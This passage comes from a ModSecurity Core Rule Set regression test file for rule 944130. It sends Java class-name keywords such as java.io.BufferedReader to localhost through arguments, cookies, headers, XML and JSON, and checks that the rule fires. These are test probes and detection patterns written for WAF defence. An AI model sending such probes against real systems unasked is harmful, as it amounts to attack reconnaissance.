"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-17 - desc: "XML element value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-18 - desc: "Nested XML element value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-19 - desc: "Content-Type text/plain includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-20 - desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-21 - desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-22 - desc: "Argument test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-23 - desc: "Argument name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-24 - desc: "Cookie test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-25 - desc: "Cookie name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-26 - desc: "Request header test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-27 - desc: "XML attribute value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-28 - desc: "XML element value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-29 - desc: "Nested XML element value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-30 - desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-31 - desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-32 - desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-33 - desc: "Argument test includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-34 - desc: "Argument name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-35 - desc: "Cookie test includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-36 - desc: "Cookie name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-37 - desc: "Request header test includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-38 - desc: "XML attribute value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-39 - desc: "XML element value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-40 - desc: "Nested XML element value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-41 - desc: "Content-Type text/plain includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-42 - desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-43 - desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-44 - desc: "Argument test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-45 - desc: "Argument name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-46 - desc: "Cookie test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-47 - desc: "Cookie name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-48 - desc: "Request header test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-49 - desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-50 - desc: "XML element value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-51 - desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-52 - desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-53 - desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-54 - desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-55 - desc: "Argument test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-56 - desc: "Argument name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-57 - desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-58 - desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-59 - desc: "Request header test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-60 - desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-61 - desc: "XML element value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-62 - desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - 